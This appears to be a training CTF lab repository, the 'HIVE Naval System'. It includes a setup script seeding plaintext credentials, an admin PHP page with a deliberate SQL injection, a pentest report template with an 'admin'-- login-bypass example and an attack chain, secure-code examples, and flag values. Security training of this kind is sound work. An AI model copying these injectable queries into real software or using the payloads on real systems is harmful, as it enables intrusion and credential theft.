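# locks down includes/config.php and prints the deployment banner. Launching
# the PHP built-in server follows this block.
#
# Must run as root (checked below). This is a deliberately vulnerable CTF lab:
# the plaintext credentials seeded here are part of the exercise (HINTS.md
# lists carl/ilovemywife as the default-credential challenge).
#
# Fixes relative to the previous revision:
#  - the import result was read from "$?" after "mysql | grep -v", i.e. grep's
#    status, which is 1 on a clean import with no output — success was reported
#    as failure and the checksum never saved;
#  - the checksum file stored the full "hash  filename" md5sum line but was
#    compared against the bare hash, so every run re-imported;
#  - md5sum was invoked on officers.sql before checking that the file exists.

# ASCII-art banner (its column alignment was collapsed in this listing)
echo -e "\033[34m"
echo " __ __ _______ __ __ ___ _______ ___ ___ "
echo " | | | || || | | || | | || | | |"
echo " | |_| || ___|| |_| || | |_ _|| | | |"
echo " | || |___ | || | | | | | | |"
echo " | | | || ___||_ _|| | | | | |___ | |"
echo " | ||_|| || |___ | | | | | | | || |"
echo " |_| |_||_______| |___| |___| |___| |_______||___|"
echo -e "\033[0m"

# Check for root privileges
if [ "$(id -u)" -ne 0 ]; then
    echo -e "\033[31m✘ Ahoy Captain! We need root privileges to deploy the system!\033[0m"
    exit 1
fi

# Install required packages
echo -e "\033[33m⚓ Anchors aweigh! Installing dependencies...\033[0m"
apt-get update

# Handle different MySQL server package names
if apt-cache show mysql-server &> /dev/null; then
    apt-get install -y mysql-server php php-mysql php-mysqli
else
    echo -e "\033[33m⚠ mysql-server not found, trying default-mysql-server...\033[0m"
    apt-get install -y default-mysql-server php php-mysql php-mysqli
fi

# Verify MySQL installation and install client if needed
if ! command -v mysql &> /dev/null; then
    echo -e "\033[33m⚠ MySQL client not found, installing...\033[0m"
    if apt-cache show mysql-client &> /dev/null; then
        apt-get install -y mysql-client
    elif apt-cache show default-mysql-client &> /dev/null; then
        apt-get install -y default-mysql-client
    else
        echo -e "\033[31m✘ MySQL client packages not found! Trying mariadb-server...\033[0m"
        apt-get install -y mariadb-server php php-mysql
    fi
fi

# Configure MySQL
echo -e "\033[33m🌊 Charting the database waters...\033[0m"

# Start MySQL service if not running.
# The script already runs as root, so the sudo retries below only matter when
# sudo is configured differently from the current shell; kept for compatibility.
if ! systemctl is-active --quiet mysql; then
    systemctl start mysql || {
        echo -e "\033[33m⚠ Couldn't start MySQL normally, trying with sudo...\033[0m"
        sudo systemctl start mysql
    }
fi

# Create database and user without prompting for password
echo -e "\033[33m🔑 Attempting database setup...\033[0m"

if ! mysql -e "CREATE DATABASE IF NOT EXISTS hive_naval;" 2>/dev/null; then
    echo -e "\033[33m⚠ MySQL root access required. Trying with sudo...\033[0m"
    sudo mysql -e "CREATE DATABASE IF NOT EXISTS hive_naval;" || {
        echo -e "\033[31m✘ Failed to create database with sudo.\033[0m"
        exit 1
    }
else
    echo -e "\033[32m✔ Database hive_naval exists or created successfully.\033[0m"
fi

if ! mysql -e "CREATE USER IF NOT EXISTS 'hive_user'@'localhost' IDENTIFIED BY 'N@vyS3cr3t!';" 2>/dev/null; then
    echo -e "\033[33m⚠ MySQL root access required. Trying with sudo...\033[0m"
    sudo mysql -e "CREATE USER IF NOT EXISTS 'hive_user'@'localhost' IDENTIFIED BY 'N@vyS3cr3t!';" || {
        echo -e "\033[31m✘ Failed to create user with sudo.\033[0m"
        exit 1
    }
else
    echo -e "\033[32m✔ User hive_user exists or created successfully.\033[0m"
fi

echo -e "\033[33m🔐 Granting privileges to hive_user...\033[0m"
if ! mysql -e "GRANT ALL PRIVILEGES ON hive_naval.* TO 'hive_user'@'localhost';" 2>/dev/null; then
    echo -e "\033[33m⚠ Trying to grant privileges with sudo...\033[0m"
    sudo mysql -e "GRANT ALL PRIVILEGES ON hive_naval.* TO 'hive_user'@'localhost';" || {
        echo -e "\033[31m✘ Failed to grant privileges with sudo.\033[0m"
        exit 1
    }
else
    echo -e "\033[32m✔ Privileges granted successfully.\033[0m"
fi

mysql -e "FLUSH PRIVILEGES;"

# Import database schema if officers.sql has changed.
# .officers_sql.md5 holds the bare hash (first md5sum field); it is read through
# awk so that checksum files written by older runs, which contain the whole
# "hash  filename" line, still compare correctly.
echo -e "\033[33m📦 Checking officers.sql for changes...\033[0m"
if [ ! -f .officers_sql.md5 ]; then
    echo -e "\033[33mℹ No previous checksum found. Importing officers.sql...\033[0m"
    import_needed=true
else
    # A missing officers.sql yields an empty hash here and is reported below.
    current_md5=$(md5sum officers.sql 2>/dev/null | awk '{ print $1 }')
    saved_md5=$(awk '{ print $1 }' .officers_sql.md5)
    if [ "$current_md5" != "$saved_md5" ]; then
        echo -e "\033[33mℹ officers.sql has changed. Importing updated file...\033[0m"
        import_needed=true
    else
        echo -e "\033[32m✔ officers.sql unchanged. Skipping import.\033[0m"
        import_needed=false
    fi
fi

if [ "$import_needed" = true ]; then
    if [ -f officers.sql ]; then
        # Import schema and data. ERROR 1050 (table already exists) is tolerated
        # as before; any other ERROR line fails the import. mysql's own exit
        # status is captured before the output is filtered.
        import_output=$(mysql hive_naval < officers.sql 2>&1)
        import_status=$?
        if [ -n "$import_output" ]; then
            printf '%s\n' "$import_output" | grep -v "ERROR 1050 (42S01)"
        fi
        residual_errors=$(printf '%s\n' "$import_output" | grep -v "ERROR 1050 (42S01)" | grep "ERROR")
        if [ "$import_status" -eq 0 ] || [ -z "$residual_errors" ]; then
            echo -e "\033[32m✔ Database schema imported successfully.\033[0m"
            # Store only the hash so it matches the comparison above.
            md5sum officers.sql | awk '{ print $1 }' > .officers_sql.md5
        else
            echo -e "\033[31m✘ Error importing database schema.\033[0m"
        fi
    else
        echo -e "\033[31m✘ Missing officers.sql - database will be empty!\033[0m"
    fi

    # Ensure 'carl' user is present.
    # The trailing UPDATE also resets the username, which the
    # ON DUPLICATE KEY UPDATE clause does not touch.
    echo -e "\033[33m🔧 Ensuring 'carl' user is present in the database...\033[0m"
    mysql hive_naval -e "
    INSERT INTO officers (uuid, rank, name, username, email, password) VALUES
    ('cdb525f9-6a36-484e-8aeb-47c8bf097c69', 'Captain', 'Captain Frimpong Carl', 'carl', 'user4@hivenaval.local', 'ilovemywife')
    ON DUPLICATE KEY UPDATE rank=VALUES(rank), name=VALUES(name), email=VALUES(email), password=VALUES(password);
    UPDATE officers SET username='carl', rank='Captain', name='Captain Frimpong Carl', email='user4@hivenaval.local', password='ilovemywife' WHERE uuid='cdb525f9-6a36-484e-8aeb-47c8bf097c69';
    "

    # Ensure 'admin' user is present (same pattern as above)
    echo -e "\033[33m🔧 Ensuring 'admin' user is present in the database...\033[0m"
    mysql hive_naval -e "
    INSERT INTO officers (uuid, rank, name, username, email, password) VALUES
    ('0b8d6b5d-109d-11f0-8f93-d92a45da78ca', 'Admiral', 'System Admin', 'admin', 'admin@navy.mil', 'navy12345')
    ON DUPLICATE KEY UPDATE rank=VALUES(rank), name=VALUES(name), email=VALUES(email), password=VALUES(password);
    UPDATE officers SET username='admin', rank='Admiral', name='System Admin', email='admin@navy.mil', password='navy12345' WHERE uuid='0b8d6b5d-109d-11f0-8f93-d92a45da78ca';
    "
fi

# Set file permissions — config.php carries the database credentials, so it is
# readable by its owner only.
echo -e "\033[33m🔒 Securing the hatches...\033[0m"
chmod 600 includes/config.php

echo -e "\033[32m"
echo "╔══════════════════════════════════════════╗"
echo "║ Hive Naval System successfully deployed ║"
echo "╚══════════════════════════════════════════╝"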
151 | echo -e "\033[0m" 152 | 153 | echo -e "\033[36m🚀 Launching system on http://127.0.0.1:9000\033[0m" 154 | echo -e "\033[35mTry these secret codes after setup:" 155 | echo "- Login with the credential of that guy that was careless with his logins: carl/ilovemywife" 156 | echo "- Backup code: 1337" 157 | echo "- Konami code: ↑↑↓↓←→←→BA" 158 | echo "- Right-click admin dashboard\033[0m" 159 | php -S 127.0.0.1:9000 160 | -------------------------------------------------------------------------------- /admin/access_control.php: -------------------------------------------------------------------------------- 1 | ACCESS DENIED

Administrator privileges required

');
}

// Security headers
header('X-Content-Type-Options: nosniff');
header('X-Frame-Options: DENY');
// NOTE(review): X-XSS-Protection is a legacy header that most current browsers
// no longer act on; a Content-Security-Policy is the present-day control.
header('X-XSS-Protection: 1; mode=block');

// Get all officers except the last one, set default rank if empty
// (the row with the highest id is excluded by the WHERE clause; a NULL rank is
// presented as 'officer'). The query is static — no request data goes into it.
$users = [];
$result = $conn->query("SELECT id, name,
COALESCE(rank, 'officer') AS rank
FROM officers
WHERE id < (SELECT MAX(id) FROM officers)");
if ($result) {
    $users = $result->fetch_all(MYSQLI_ASSOC);
} else {
    $error = "Failed to load users: " . $conn->error;
}

// Process role updates - vulnerable direct query
// $user_id and $new_role are interpolated verbatim into the UPDATE below, so
// either value can change the statement's structure; this file's own comments
// mark it as the lab's intended SQL-injection point. The hardened form, as in
// the repo's secure examples, is a prepared statement with bound parameters,
// e.g. (constructed example):
//   $stmt = $conn->prepare("UPDATE officers SET rank = COALESCE(?, 'officer') WHERE id = ?");
//   $stmt->bind_param("si", $new_role, $user_id);
// No CSRF token is checked in the visible code, and $_SESSION is written
// without a session_start() in view — presumably both live in an include above
// this listing's cut; confirm there.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $user_id = $_POST['user_id'];
    $new_role = $_POST['new_role'];

    // No input validation
    $conn->query("UPDATE officers SET rank = COALESCE('$new_role', 'officer') WHERE id = $user_id");
    if ($conn->error) {
        $error = "Update failed: " . $conn->error;
    } else {
        // Redirect-after-POST: the flash message is shown by the GET that follows.
        $_SESSION['flash'] = "Role updated";
        header("Location: access_control.php");
        exit();
    }
}
?>

Access Control | HCNMS

Access Control Panel

164 | Back to Admin 165 |
166 | 167 | 168 |
171 | 172 | 173 | 174 |
177 | 178 | 179 | 180 | 181 | 182 | 183 | 184 | 185 | 186 | 187 | 188 | 189 | 190 | 191 | 192 | 193 | 194 | 195 | 209 | 210 | 211 | 212 |
IDNameCurrent RankActions
197 | 198 | 206 | 207 |
214 | 215 | 216 | -------------------------------------------------------------------------------- /REPORT_TEMPLATE.md: -------------------------------------------------------------------------------- 1 | # 📋 Penetration Test Report Template 2 | 3 | **Target**: HIVE Naval Command System 4 | **Tester**: [Your Name] 5 | **Date**: [Date] 6 | **Duration**: [Time Spent] 7 | 8 | --- 9 | 10 | ## Executive Summary 11 | 12 | [Provide a brief overview of your findings. Summarize the most critical vulnerabilities and overall security posture.] 13 | 14 | **Key Findings**: 15 | 16 | - Total Vulnerabilities Found: X 17 | - Critical: X 18 | - High: X 19 | - Medium: X 20 | - Low: X 21 | 22 | **Overall Risk Rating**: [Critical/High/Medium/Low] 23 | 24 | --- 25 | 26 | ## Scope 27 | 28 | **In Scope**: 29 | 30 | - Web Application: http://localhost/ 31 | - All publicly accessible pages 32 | - Authentication mechanisms 33 | - File upload functionality 34 | - Admin panel 35 | 36 | **Out of Scope**: 37 | 38 | - Physical security 39 | - Social engineering 40 | - Denial of Service attacks 41 | 42 | --- 43 | 44 | ## Methodology 45 | 46 | [Describe your testing approach] 47 | 48 | 1. Reconnaissance 49 | 2. Vulnerability Scanning 50 | 3. Manual Testing 51 | 4. Exploitation 52 | 5. Post-Exploitation 53 | 6. 
Reporting 54 | 55 | **Tools Used**: 56 | 57 | - Burp Suite 58 | - SQLMap 59 | - Browser Developer Tools 60 | - [Other tools] 61 | 62 | --- 63 | 64 | ## Findings 65 | 66 | ### Finding #1: [Vulnerability Name] 67 | 68 | **Severity**: [Critical/High/Medium/Low] 69 | **CVSS Score**: [If applicable] 70 | **CWE**: [CWE Number] 71 | 72 | **Affected Component**: [File/Page/Feature] 73 | 74 | **Description**: 75 | [Detailed description of the vulnerability] 76 | 77 | **Proof of Concept**: 78 | 79 | ``` 80 | [Step-by-step reproduction steps or exploit code] 81 | ``` 82 | 83 | **Impact**: 84 | [What an attacker could achieve with this vulnerability] 85 | 86 | **Remediation**: 87 | [Specific recommendations to fix the vulnerability] 88 | 89 | **References**: 90 | 91 | - [OWASP link] 92 | - [CVE if applicable] 93 | 94 | --- 95 | 96 | ### Finding #2: SQL Injection in Login Form 97 | 98 | **Severity**: Critical 99 | **CVSS Score**: 9.8 100 | **CWE**: CWE-89 101 | 102 | **Affected Component**: `login.php` line 26 103 | 104 | **Description**: 105 | The login form is vulnerable to SQL injection due to direct string interpolation in the SQL query without proper sanitization or prepared statements. 106 | 107 | **Proof of Concept**: 108 | 109 | ``` 110 | 1. Navigate to login.php 111 | 2. Enter username: admin'-- 112 | 3. Enter any password 113 | 4. Click login 114 | 5. Successfully authenticated as admin without knowing the password 115 | ``` 116 | 117 | **SQL Query**: 118 | 119 | ```sql 120 | SELECT * FROM officers WHERE username='admin'--' AND password='anything' 121 | ``` 122 | 123 | **Impact**: 124 | 125 | - Authentication bypass 126 | - Unauthorized access to admin panel 127 | - Potential data exfiltration 128 | - Database manipulation 129 | 130 | **Remediation**: 131 | 132 | ```php 133 | // Use prepared statements 134 | $stmt = $conn->prepare("SELECT * FROM officers WHERE username=? 
AND password=?"); 135 | $stmt->bind_param("ss", $username, $password); 136 | $stmt->execute(); 137 | $result = $stmt->get_result(); 138 | ``` 139 | 140 | **References**: 141 | 142 | - OWASP SQL Injection: https://owasp.org/www-community/attacks/SQL_Injection 143 | - CWE-89: https://cwe.mitre.org/data/definitions/89.html 144 | 145 | --- 146 | 147 | ### Finding #3: [Add more findings] 148 | 149 | [Continue with the same format for each vulnerability] 150 | 151 | --- 152 | 153 | ## Vulnerability Summary Table 154 | 155 | | ID | Vulnerability | Severity | Status | 156 | | --- | ----------------- | -------- | --------- | 157 | | 1 | SQL Injection | Critical | Exploited | 158 | | 2 | Command Injection | Critical | Exploited | 159 | | 3 | XSS | High | Exploited | 160 | | 4 | IDOR | High | Exploited | 161 | | 5 | File Upload | Critical | Exploited | 162 | 163 | --- 164 | 165 | ## Attack Chain 166 | 167 | [Describe how vulnerabilities can be chained together] 168 | 169 | Example: 170 | 171 | 1. SQL Injection to gain admin access 172 | 2. Access admin panel 173 | 3. Use command injection to execute system commands 174 | 4. Upload web shell for persistent access 175 | 5. Escalate privileges 176 | 6. 
Full system compromise 177 | 178 | --- 179 | 180 | ## Flags Captured 181 | 182 | | Flag ID | Flag Value | Points | 183 | | ---------- | ------------------------ | ------ | 184 | | FLAG-001 | CTF{carl_loves_his_wife} | 5 | 185 | | FLAG-011 | CTF{sql_injection_pwned} | 10 | 186 | | [Add more] | | | 187 | 188 | **Total Points**: XX/300 189 | 190 | --- 191 | 192 | ## Timeline 193 | 194 | | Time | Activity | 195 | | ----- | ---------------------------------- | 196 | | 00:00 | Started reconnaissance | 197 | | 00:15 | Discovered SQL injection | 198 | | 00:30 | Gained admin access | 199 | | 01:00 | Achieved RCE via command injection | 200 | | 01:30 | Uploaded web shell | 201 | | 02:00 | Completed testing | 202 | 203 | --- 204 | 205 | ## Evidence 206 | 207 | ### Screenshot 1: SQL Injection 208 | 209 | [Insert screenshot showing successful SQL injection] 210 | 211 | ### Screenshot 2: Command Injection 212 | 213 | [Insert screenshot showing command execution] 214 | 215 | ### Screenshot 3: Admin Panel Access 216 | 217 | [Insert screenshot of admin panel] 218 | 219 | --- 220 | 221 | ## Risk Assessment 222 | 223 | ### Critical Risks 224 | 225 | 1. **SQL Injection**: Allows complete database compromise 226 | 2. **Command Injection**: Enables remote code execution 227 | 3. **File Upload**: Permits web shell upload 228 | 229 | ### High Risks 230 | 231 | 1. **IDOR**: Exposes sensitive user data 232 | 2. **XSS**: Enables session hijacking 233 | 234 | ### Medium Risks 235 | 236 | 1. **Session Fixation**: Allows session hijacking 237 | 2. **Information Disclosure**: Reveals sensitive information 238 | 239 | --- 240 | 241 | ## Recommendations 242 | 243 | ### Immediate Actions (Critical) 244 | 245 | 1. Implement prepared statements for all database queries 246 | 2. Sanitize all user inputs before passing to system commands 247 | 3. Implement file type validation and content inspection 248 | 4. Add CSRF tokens to all forms 249 | 250 | ### Short-term Actions (High) 251 | 252 | 1. 
Implement proper access controls 253 | 2. Add output encoding to prevent XSS 254 | 3. Use secure session management 255 | 4. Enable security headers 256 | 257 | ### Long-term Actions (Medium) 258 | 259 | 1. Conduct regular security audits 260 | 2. Implement Web Application Firewall (WAF) 261 | 3. Security training for developers 262 | 4. Implement security testing in CI/CD pipeline 263 | 264 | --- 265 | 266 | ## Conclusion 267 | 268 | [Summarize your findings and overall assessment] 269 | 270 | The HIVE Naval Command System contains multiple critical vulnerabilities that allow for complete system compromise. Immediate remediation is required for all critical findings. 271 | 272 | --- 273 | 274 | ## Appendix 275 | 276 | ### A. Tools Used 277 | 278 | - Burp Suite Community Edition v2023.x 279 | - SQLMap v1.7.x 280 | - Browser: Chrome/Firefox Developer Tools 281 | 282 | ### B. Testing Environment 283 | 284 | - OS: [Your OS] 285 | - Target: http://localhost/ 286 | - Database: MySQL 287 | 288 | ### C. References 289 | 290 | - OWASP Top 10 2021 291 | - CWE/SANS Top 25 292 | - NIST Guidelines 293 | 294 | --- 295 | 296 | **Report Prepared By**: [Your Name] 297 | **Date**: [Date] 298 | **Signature**: ******\_\_\_****** 299 | -------------------------------------------------------------------------------- /secure_example/README.md: -------------------------------------------------------------------------------- 1 | # 🔒 Secure Code Examples 2 | 3 | This directory contains **secure implementations** of the vulnerable features in the HIVE Naval System CTF. Use these as references to understand how to properly fix the vulnerabilities. 4 | 5 | --- 6 | 7 | ## 📁 Files in This Directory 8 | 9 | ### 1. 
[`login_secure.php`](login_secure.php) 10 | 11 | **Secure authentication implementation** 12 | 13 | **Vulnerabilities Fixed:** 14 | 15 | - ✅ SQL Injection → Uses prepared statements 16 | - ✅ Session Fixation → Regenerates session ID on login 17 | - ✅ Insecure Cookies → Sets HttpOnly, Secure, SameSite flags 18 | - ✅ CSRF → Implements CSRF token validation 19 | - ✅ Weak Session Config → Proper session settings 20 | 21 | **Key Security Features:** 22 | 23 | ```php 24 | // Prepared statement prevents SQL injection 25 | $stmt = $conn->prepare("SELECT * FROM officers WHERE username = ?"); 26 | $stmt->bind_param("s", $username); 27 | 28 | // Session regeneration prevents fixation 29 | session_regenerate_id(true); 30 | 31 | // Secure cookie configuration 32 | setcookie("naval_user", $username, [ 33 | 'httponly' => true, // No JavaScript access 34 | 'secure' => true, // HTTPS only 35 | 'samesite' => 'Strict' // CSRF protection 36 | ]); 37 | ``` 38 | 39 | --- 40 | 41 | ### 2. [`upload_secure.php`](upload_secure.php) 42 | 43 | **Secure file upload implementation** 44 | 45 | **Vulnerabilities Fixed:** 46 | 47 | - ✅ Unrestricted File Upload → Extension whitelist 48 | - ✅ MIME Type Bypass → Validates actual MIME type 49 | - ✅ Code Execution → Scans content for malicious code 50 | - ✅ Predictable Filenames → Random filename generation 51 | 52 | **Key Security Features:** 53 | 54 | ```php 55 | // Extension whitelist 56 | $allowed_extensions = ['txt', 'pdf', 'doc', 'docx', 'jpg', 'png']; 57 | 58 | // MIME type validation 59 | $finfo = finfo_open(FILEINFO_MIME_TYPE); 60 | $mime_type = finfo_file($finfo, $file_tmp); 61 | 62 | // Content scanning 63 | if (preg_match('/<\?php|<\?=| 19 | 161 | 162 | 163 | 164 |
165 | UNCLASSIFIED // FOR OFFICIAL USE ONLY 166 |

PERSONNEL PROFILE

171 | ◄ RETURN TO COMMAND CENTER 172 |
SERVICE NUMBER (ID)

OFFICIAL EMAIL

CURRENT ASSIGNMENT

DEPLOYMENT STATUS

SECURITY CLEARANCE

LAST LOGIN

216 | UNCLASSIFIED // FOR OFFICIAL USE ONLY 217 |
// ---- /static/js/naval_operations.js ----
// UTC Clock and Operational Status
//
// NOTE(review): this listing's renderer stripped the HTML elements out of the
// template literals assigned to innerHTML below; only their text nodes survive,
// so the markup shown here does not match the real file. Everything that is
// interpolated into those templates is a hard-coded constant or a formatted
// Date — no user-controlled input reaches innerHTML in this file.
class NavalOperations {
    // Starts both widgets as soon as an instance is created (see the
    // DOMContentLoaded hook at the bottom of the file).
    constructor() {
        this.initUTCClock();
        this.initOperationalStatus();
    }

    // UTC Clock
    // Renders once immediately, then every second. The interval handle is not
    // kept, so the timer runs for the lifetime of the page.
    initUTCClock() {
        this.updateUTCClock();
        setInterval(() => this.updateUTCClock(), 1000);
    }

    // Rewrites #utc-clock with the current UTC date and time; a no-op when the
    // element is not on the page.
    updateUTCClock() {
        const clockElement = document.getElementById('utc-clock');
        if (!clockElement) return;

        const now = new Date();

        // Format date: DD MMM YYYY
        const day = String(now.getUTCDate()).padStart(2, '0');
        const months = ['JAN', 'FEB', 'MAR', 'APR', 'MAY', 'JUN', 'JUL', 'AUG', 'SEP', 'OCT', 'NOV', 'DEC'];
        const month = months[now.getUTCMonth()];
        const year = now.getUTCFullYear();

        // Format time: HH:MM:SS
        const hours = String(now.getUTCHours()).padStart(2, '0');
        const minutes = String(now.getUTCMinutes()).padStart(2, '0');
        const seconds = String(now.getUTCSeconds()).padStart(2, '0');

        // Element wrappers stripped in this listing (see the note at the top).
        clockElement.innerHTML = `
${day} ${month} ${year}
${hours}:${minutes}:${seconds}
ZULU
`;
    }

    // Operational Status
    // Fills #operational-status with a fixed, simulated status block, then
    // refreshes only its "Last Update" value every 30 seconds.
    initOperationalStatus() {
        const statusElement = document.getElementById('operational-status');
        if (!statusElement) return;

        // Simulate operational data — every field except lastUpdate is a constant.
        const status = {
            threatcon: 'BRAVO',
            fleetStatus: 'DEPLOYED',
            activeShips: 47,
            personnel: 12450,
            readiness: 'HIGH',
            lastUpdate: this.getFormattedTime()
        };

        // Element wrappers stripped in this listing (see the note at the top);
        // the selector used below implies .status-row / .status-value classes
        // in the real markup.
        statusElement.innerHTML = `
THREATCON:
${status.threatcon}
Fleet Status:
${status.fleetStatus}
Active Ships:
${status.activeShips}
Personnel:
${status.personnel.toLocaleString()}
Readiness:
${status.readiness}
Last Update:
${status.lastUpdate}
`;

        // Update every 30 seconds — only the last row's value (the timestamp)
        // is rewritten, the rest of the block stays as rendered above.
        setInterval(() => {
            const lastUpdateElement = statusElement.querySelector('.status-row:last-child .status-value');
            if (lastUpdateElement) {
                lastUpdateElement.textContent = this.getFormattedTime();
            }
        }, 30000);
    }

    // Current UTC time as "DD MMM YYYY HH:MMZ" (minute resolution, unlike the
    // clock, which shows seconds).
    getFormattedTime() {
        const now = new Date();
        const day = String(now.getUTCDate()).padStart(2, '0');
        const months = ['JAN', 'FEB', 'MAR', 'APR', 'MAY', 'JUN', 'JUL', 'AUG', 'SEP', 'OCT', 'NOV', 'DEC'];
        const month = months[now.getUTCMonth()];
        const year = now.getUTCFullYear();
        const hours = String(now.getUTCHours()).padStart(2, '0');
        const minutes = String(now.getUTCMinutes()).padStart(2, '0');

        return `${day} ${month} ${year} ${hours}:${minutes}Z`;
    }

    // THREATCON levels and their meanings
    // Returns the { color, description } entry for `level`; unknown levels
    // (including undefined) fall back to the NORMAL entry.
    static getThreatconInfo(level) {
        const levels = {
            'NORMAL': {
                color: 'normal',
                description: 'General global threat of terrorist activity'
            },
            'ALPHA': {
                color: 'alpha',
                description: 'General threat of possible terrorist activity'
            },
            'BRAVO': {
                color: 'bravo',
                description: 'Increased and more predictable threat'
            },
            'CHARLIE': {
                color: 'charlie',
                description: 'Incident occurred or intelligence received'
            },
            'DELTA': {
                color: 'delta',
                description: 'Imminent threat or terrorist attack occurring'
            }
        };
        return levels[level] || levels['NORMAL'];
    }

    // Generate random ship names
    // Uniform pick over the combined carrier/destroyer/cruiser/submarine list.
    // Math.random() is adequate here: these are presumably display fixtures
    // (the callers are not in this file).
    static getRandomShipName() {
        const carriers = ['USS Ronald Reagan', 'USS Nimitz', 'USS Enterprise', 'USS Carl Vinson', 'USS Abraham Lincoln'];
        const destroyers = ['USS Arleigh Burke', 'USS John Paul Jones', 'USS Fitzgerald', 'USS Cole', 'USS Mason'];
        const cruisers = ['USS Bunker Hill', 'USS Mobile Bay', 'USS Antietam', 'USS Chancellorsville'];
        const submarines = ['USS Virginia', 'USS Texas', 'USS Hawaii', 'USS North Carolina'];

        const allShips = [...carriers, ...destroyers, ...cruisers, ...submarines];
        return allShips[Math.floor(Math.random() * allShips.length)];
    }

    // Generate random deployment location
    // Uniform pick from the list below.
    static getRandomLocation() {
        const locations = [
            'Western Pacific',
            'Mediterranean Sea',
            'Arabian Gulf',
            'North Atlantic',
            'South China Sea',
            'Indian Ocean',
            'Norfolk, VA',
            'San Diego, CA',
            'Pearl Harbor, HI',
            'Yokosuka, Japan',
            'Bahrain',
            'Guam'
        ];
        return locations[Math.floor(Math.random() * locations.length)];
    }

    // Generate security clearance
    // Weighted pick: 50% CONFIDENTIAL, 35% SECRET, 15% TOP SECRET (the weights
    // sum to 1, so the final return covers the remaining 15%).
    static getRandomClearance() {
        const clearances = ['CONFIDENTIAL', 'SECRET', 'TOP SECRET'];
        const weights = [0.5, 0.35, 0.15]; // Weighted distribution
        const random = Math.random();

        if (random < weights[0]) return clearances[0];
        if (random < weights[0] + weights[1]) return clearances[1];
        return clearances[2];
    }

    // Get deployment status
    // Weighted pick: 30% DEPLOYED, 40% SHORE DUTY, 20% TRAINING, 10% IN TRANSIT.
    static getRandomDeploymentStatus() {
        const statuses = ['DEPLOYED', 'SHORE DUTY', 'TRAINING', 'IN TRANSIT'];
        const weights = [0.3, 0.4, 0.2, 0.1];
        const random = Math.random();

        if (random < weights[0]) return statuses[0];
        if (random < weights[0] + weights[1]) return statuses[1];
        if (random < weights[0] + weights[1] + weights[2]) return statuses[2];
        return statuses[3];
    }
}

// Initialize on page load
document.addEventListener('DOMContentLoaded', () => {
    new NavalOperations();
});

// Make available globally — the static helpers can then be reached from other
// scripts as window.NavalOperations.*
window.NavalOperations = NavalOperations;
// ---- next file in this listing: /admin/view_all_officers.php ----
-------------------------------------------------------------------------------- 1 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | All Officers | HCNMS 20 | 191 | 192 | 193 | 194 |

All Naval Officers

197 | Back to Dashboard 198 |


215 | ID: 216 | 217 |
218 |
219 | Email: 220 | 221 |
222 |
223 | Department: 224 | 225 |
226 |
227 | Clearance: 228 | 229 |
234 | View Profile 235 | Delete 236 |
242 | 243 | 244 | -------------------------------------------------------------------------------- /static/js/flag_popup.js: -------------------------------------------------------------------------------- 1 | // Flag Popup System - Include this in your pages 2 | // Usage: showFlag('FLAG-001', 'CTF{carl_loves_his_wife}', 5); 3 | 4 | function showFlag(flagId, flagValue, points) { 5 | // Create overlay 6 | const overlay = document.createElement("div"); 7 | overlay.style.cssText = ` 8 | position: fixed; 9 | top: 0; 10 | left: 0; 11 | width: 100%; 12 | height: 100%; 13 | background: rgba(0, 0, 0, 0.8); 14 | z-index: 10000; 15 | display: flex; 16 | align-items: center; 17 | justify-content: center; 18 | animation: fadeIn 0.3s ease; 19 | `; 20 | 21 | // Create popup 22 | const popup = document.createElement("div"); 23 | popup.style.cssText = ` 24 | background: linear-gradient(135deg, #0a192f, #172a45); 25 | border: 3px solid #64ffda; 26 | border-radius: 20px; 27 | padding: 40px; 28 | max-width: 500px; 29 | text-align: center; 30 | box-shadow: 0 0 50px rgba(100, 255, 218, 0.5); 31 | animation: popIn 0.5s cubic-bezier(0.68, -0.55, 0.265, 1.55); 32 | position: relative; 33 | `; 34 | 35 | popup.innerHTML = ` 36 | 119 |
🚩
120 |
FLAG CAPTURED!
121 |
${flagId}
122 |
${flagValue}
123 |
+${points} Points
124 | 125 | `; 126 | 127 | // Add confetti 128 | for (let i = 0; i < 30; i++) { 129 | const confetti = document.createElement("div"); 130 | confetti.className = "confetti"; 131 | confetti.style.left = Math.random() * 100 + "%"; 132 | confetti.style.top = "-10px"; 133 | confetti.style.background = ["#64ffda", "#00ff00", "#ffff00", "#ff00ff"][ 134 | Math.floor(Math.random() * 4) 135 | ]; 136 | confetti.style.animationDelay = Math.random() * 2 + "s"; 137 | popup.appendChild(confetti); 138 | } 139 | 140 | overlay.className = "flag-overlay"; 141 | overlay.appendChild(popup); 142 | document.body.appendChild(overlay); 143 | 144 | // Play sound if available 145 | try { 146 | const audio = new Audio( 147 | "data:audio/wav;base64,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" 148 | ); 149 | audio.volume = 0.3; 150 | audio.play().catch(() => {}); 151 | } catch (e) {} 152 | 153 | // Log to player progress 154 | logFlagCapture(flagId, flagValue, points); 155 | 156 | // Auto-close after 10 seconds 157 | setTimeout(() => { 158 | if (document.body.contains(overlay)) { 159 | overlay.style.animation = "fadeIn 0.3s ease reverse"; 160 | setTimeout(() => overlay.remove(), 300); 161 | } 162 | }, 10000); 163 | } 164 | 165 | function logFlagCapture(flagId, flagValue, points) { 166 | // Send to server for logging 167 | fetch("/log_flag.php", { 168 | method: "POST", 169 | headers: { "Content-Type": "application/json" }, 170 | body: JSON.stringify({ 171 | flag_id: flagId, 172 | flag_value: flagValue, 173 | points: points, 174 | timestamp: new Date().toISOString(), 175 | }), 176 | }).catch(() => {}); 177 | 178 | // Also save to localStorage 179 | const flags = JSON.parse(localStorage.getItem("captured_flags") || "[]"); 180 | if (!flags.find((f) => f.flag_id === flagId)) { 181 | flags.push({ 182 | flag_id: flagId, 183 | flag_value: flagValue, 184 | points: points, 185 | timestamp: new Date().toISOString(), 186 | }); 187 | localStorage.setItem("captured_flags", JSON.stringify(flags)); 
188 | } 189 | } 190 | 191 | // Example usage in vulnerable pages: 192 | // After successful SQL injection: 193 | // showFlag('FLAG-011', 'CTF{sql_injection_pwned}', 10); 194 | 195 | // After command injection: 196 | // showFlag('FLAG-021', 'CTF{command_injection_rce}', 15); 197 | -------------------------------------------------------------------------------- /HINTS.md: -------------------------------------------------------------------------------- 1 | # 🎯 HIVE Naval System - Progressive Hints 2 | 3 | > ⚠️ **SPOILER WARNING**: This document contains hints that will help you solve challenges. Try to solve them yourself first! 4 | 5 | --- 6 | 7 | ## 🟢 Level 1 - Getting Started (Easy) 8 | 9 | ### Challenge: Find Default Credentials 10 | 11 |
